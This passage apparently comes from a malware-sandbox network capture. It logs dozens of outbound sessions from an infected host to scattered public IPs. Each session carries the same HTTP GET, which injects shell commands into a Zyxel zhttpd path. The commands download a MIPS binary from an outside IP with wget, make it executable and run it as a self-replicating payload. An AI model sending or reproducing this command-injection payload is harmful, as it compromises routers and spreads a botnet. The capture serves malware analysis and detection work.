                                          Jan 14, 2024 15:46:06.796196938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2195192.168.2.234996881.113.159.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796247959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2196192.168.2.2355688171.149.240.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796251059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2197192.168.2.234941659.49.38.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796257973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2198192.168.2.2349622196.145.108.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796302080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2199192.168.2.23443741.168.189.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796333075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2200192.168.2.2352336119.176.38.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796364069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2201192.168.2.233973650.4.222.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796365023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2202192.168.2.2345256168.184.90.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796396017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2203192.168.2.2350644101.146.193.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796417952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2204192.168.2.235834279.240.143.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796447992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2205192.168.2.235689461.148.227.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796462059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2206192.168.2.2354834165.199.175.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796488047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2207192.168.2.2343976153.17.224.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796509027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2208192.168.2.236029450.109.46.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796549082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2209192.168.2.23587001.141.115.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796550989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2210192.168.2.2353866126.178.240.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796575069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2211192.168.2.2351168163.59.111.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796588898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2212192.168.2.2333914204.151.199.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796614885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2213192.168.2.2349738217.22.208.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796649933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2214192.168.2.2356212120.72.55.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796658039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2215192.168.2.2350920166.250.167.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796708107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2216192.168.2.2333776221.222.189.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796745062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2217192.168.2.234078613.36.221.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796746016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2218192.168.2.2332794143.180.50.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796749115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2219192.168.2.2336054117.15.137.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796772003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2220192.168.2.235520635.34.113.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796786070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2221192.168.2.2353940119.226.83.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796823978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2222192.168.2.2349730216.144.43.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796835899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2223192.168.2.2336440109.185.39.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796844006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2224192.168.2.235374823.208.97.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796859026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2225192.168.2.2334350180.145.250.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796910048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2226192.168.2.23343045.40.200.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796933889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2227192.168.2.2356014191.19.97.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796961069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2228192.168.2.2342964185.3.149.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796986103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2229192.168.2.235921463.224.117.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.796999931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2230192.168.2.2339658118.44.202.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797055960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2231192.168.2.2352252104.217.47.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797055960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2232192.168.2.235652417.109.5.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797092915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2233192.168.2.2348748160.91.167.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797094107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2234192.168.2.2350682140.165.110.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797121048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2235192.168.2.234429852.38.0.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797153950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2236192.168.2.2338096204.101.97.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797175884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2237192.168.2.234736020.73.10.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797194958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2238192.168.2.2346768198.83.95.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797225952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2239192.168.2.2359918114.100.230.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797255993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2240192.168.2.233309265.249.85.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797276974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2241192.168.2.23586509.189.238.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797306061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2242192.168.2.2357042122.146.57.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797313929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2243192.168.2.234637096.21.168.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797352076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2244192.168.2.23370824.227.127.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797365904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2245192.168.2.2333850162.52.6.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797415018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2246192.168.2.2353386161.99.94.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797425032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2247192.168.2.234968265.200.242.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797466040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2248192.168.2.2332846220.247.209.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797483921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2249192.168.2.235910231.77.175.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797502041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2250192.168.2.234908069.38.170.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797558069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2251192.168.2.2349176202.166.246.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797579050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2252192.168.2.2343126124.34.180.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797581911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2253192.168.2.2337354101.19.170.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797595978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2254192.168.2.233381440.11.190.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797633886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2255192.168.2.23511802.246.142.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797677040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2256192.168.2.2341322118.138.14.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797691107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2257192.168.2.2348324186.156.236.218443
                                          TimestampBytes transferredDirectionData
